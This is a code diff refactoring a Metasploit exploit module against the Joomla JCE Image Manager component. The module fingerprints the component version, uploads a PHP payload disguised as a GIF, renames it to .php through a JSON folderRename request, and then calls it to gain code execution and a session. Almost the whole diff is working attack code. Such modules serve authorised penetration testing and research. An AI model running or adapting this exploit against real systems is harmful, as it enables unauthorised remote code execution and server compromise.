many code adjustments

modules/exploits/multi/http/joomla_comjce_imgmanager.rb

@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::FileDropper
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -56,17 +57,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def get_version
 		# check imgmanager version
-		@uri_base = normalize_uri(datastore['URI'], 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager')
-		uri = ''
-		uri << @uri_base
+		@uri_base = normalize_uri(datastore['URI']) + 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager'
+		uri =  @uri_base
 		print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
 		res = send_request_cgi(
 			{
 				'uri' 	  => uri,
 				'method'  => 'GET',
-				'version' => '1.1',
+				'version' => '1.1'
 
-			}, 25)
+			})
 
 		if (res and res.code == 200)
 			res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
@@ -95,39 +95,28 @@ class Metasploit3 < Msf::Exploit::Remote
 		@script_name  	= rand_text_alpha_lower(6)
 		boundary   		= '-' * 27 + rand_text_numeric(11)
 
-		uri = ''
-		uri << @uri_base
+		uri = @uri_base
 		uri << '&method=form'
 
 		# POST data
-		data = 	"--#{boundary}\r\n"
-		data << "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n"
-		data << "/\r\n"
-		data << "--#{boundary}\r\n"
-		data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n"
-		data << "Content-Type: application/octet-stream\r\n\r\n"
-		data << "\r\n"
-		data << "--#{boundary}\r\n"
-		data << "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n"
-		data << "0\r\n"
-		data << "--#{boundary}\r\n"
-		data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@script_name}.gif\"\r\n"
-		data << "Content-Type: image/gif\r\n\r\n"
-		data << "#{cmd_php}\r\n"
-		data << "--#{boundary}\r\n"
-		data << "Content-Disposition: form-data; name=\"upload-name\"\r\n\r\n"
-		data << "#{@script_name}\r\n"
-		data << "--#{boundary}\r\n"
-		data << "Content-Disposition: form-data; name=\"action\"\r\n\r\n"
-		data << "upload\r\n"
-		data << "--#{boundary}--\r\n\r\n"
+		post_data = Rex::MIME::Message.new
+		post_data.bound = boundary
+		post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
+		post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
+		post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
+		post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@script_name}.gif\"")
+		post_data.add_part("#{@script_name}", nil, nil, "form-data; name=\"upload-name\"")
+		post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")
+
+		data = post_data.to_s
+
 		res = send_request_cgi({
 			'uri'	  => uri,
 			'method'  => 'POST',
 			'version' => '1.1',
 			'data'    => data,
-			'ctype'	 => 'multipart/form-data; boundary=' + boundary
-		}, 25)
+			'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
+		})
 
 		if (res and res.code = 200 )
 			return :access_denied if (res.body =~ /RESTRICTED/i)
@@ -143,8 +132,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def renamed?
 		# Rename the file from .gif to .php
-		uri = ''
-		uri << @uri_base
+#		uri = ''
+		uri = @uri_base
 		uri << '&version=1576&cid=20'
 
 		data =	"json={\"fn\":\"folderRename\",\"args\":[\"/#{@script_name}.gif\",\"#{@script_name}.php\"]}"
@@ -162,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				{
 					'X-Request' => 'JSON'
 				}
-			}, 25)
+			})
 		if (res and res.code == 200 )
 			print_good("Renamed #{@script_name}.gif to #{@script_name}.php")
 			return true
@@ -177,9 +166,15 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Calling payload: #{@script_name}.php")
 		uri = normalize_uri(datastore['URI'])
 		uri << directory + @script_name + ".php"
-		res = send_request_raw({
-			'uri'	=> uri
-		}, 25)
+		res = send_request_cgi({
+			'uri'	=> uri,
+			'method'    => 'GET',
+			'version'   => '1.1'
+		})
+	end
+
+	def on_new_session
+		# on_new_session will force stdapi to load (for Linux meterpreter)
 	end
 
 	def exploit
@@ -188,6 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		if upload_gif == :success
 			if renamed?
 				call_payload
+				register_files_for_cleanup(@script_name)
 			end
 		end